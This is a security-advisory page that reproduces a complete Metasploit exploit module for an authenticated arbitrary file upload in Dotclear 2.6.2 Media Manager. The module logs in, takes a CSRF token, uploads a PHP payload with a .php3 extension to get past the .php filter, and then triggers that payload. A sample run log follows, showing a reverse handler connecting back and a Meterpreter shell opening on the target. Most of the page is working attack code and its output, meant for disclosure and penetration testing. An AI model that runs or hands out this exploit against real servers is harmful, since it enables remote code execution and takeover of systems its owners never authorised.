Dotclear Media Manager Authenticated Arbitrary File Upload

2014.05.23
Credit: Egidio
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'dotclear Media Manager Authenticated Arbitrary File Upload', 'Description' => %q{ The vulnerability exists because of the filemanager::isFileExclude() method not properly verifying the extension of uploaded files. This method just checks whether the uploaded file name matches the “exclude_pattern” regular expression, which by default is set to “/\.php$/i”. This could be exploited to execute arbitrary PHP code by uploading a file with multiple extensions or other extensions (like .php5 or .phtml) which might be handled as PHP scripts. Successful exploitation of this vulnerability requires an account with permissions to manage media items. }, 'Author' => [ 'Egidio Romano' #discovery ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://seclists.org/fulldisclosure/2014/May/108'] ], 'Payload' => { 'Space' => 10000, # just a big enough number to fit any PHP payload 'DisableNops' => true }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'dotclear 2.6.2', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 21 2014')) register_options([ OptString.new('USERNAME', [true, 'The username to authenticate with', 'username']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']), OptString.new('TARGETURI', [true, 'The full URI path to the instance', '/']), ], self.class) end def check end def exploit post = { 'user_id' => datastore['USERNAME'], 'user_pwd' => datastore['PASSWORD'] } print_status("Authenticating...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'admin', 'auth.php'), 'method' => 'POST', 'vars_post' => post }) if !res or !res.body fail_with("Server did not respond in an expected way") end cookie = res.headers['Set-Cookie'] print_status("Getting xd_check...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?popup=1'), 'cookie' => cookie }) if !res or !res.body fail_with("Server did not respond in an expected way") end res.body =~ /name="xd_check" value="(.*)" \/><input type="hidden" name="d"/ xd_check = $1 data = Rex::MIME::Message.new filename = Rex::Text::rand_text_alpha(8) data.add_part('2097152', nil, nil, 'form-data; name="MAX_FILE_SIZE"') data.add_part(xd_check, nil, nil, 'form-data; name="xd_check"') data.add_part('', nil, nil, 'form-data; name="upfiletitle"') data.add_part('', nil, nil, 'form-data; name="d"') data.add_part('<?php ' + payload.encoded + ' ?>', nil, 'text/php', 'form-data; name="upfile[]"; filename="' + filename + '.php3') print_status("Sending payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?pop_up=1&post_id='), 'method' => 'POST', 'cookie' => cookie, 'data' => data.to_s, 'ctype' => 'multipart/form-data; boundary=' + data.bound }) if !res or !res.body fail_with("Server did not respond in an expected way") end #do something with res print_status("Popping shell...") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'public', filename + '.php3') }) end end __END__ msf exploit(dotclear_file_upload) > show options Module options (exploit/multi/http/dotclear_file_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD fdsafdsa yes The password to authenticate with Proxies no Use a proxy chain RHOST 192.168.1.114 yes The target address RPORT 80 yes The target port TARGETURI /dotclear yes The full URI path to the instance USERNAME fdsa yes The username to authenticate with VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 dotclear 2.6.2 msf exploit(dotclear_file_upload) > exploit [*] Started reverse handler on 192.168.1.31:4444 [*] Authenticating... [*] Getting xd_check... [*] Sending payload... [*] Popping shell... [*] Sending stage (39848 bytes) to 192.168.1.114 [*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.114:33825) at 2014-05-21 18:39:07 -0500 meterpreter > sysinfo Computer : ubuntu OS : Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:15:33 UTC 2013 i686 Meterpreter : php/php meterpreter >


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top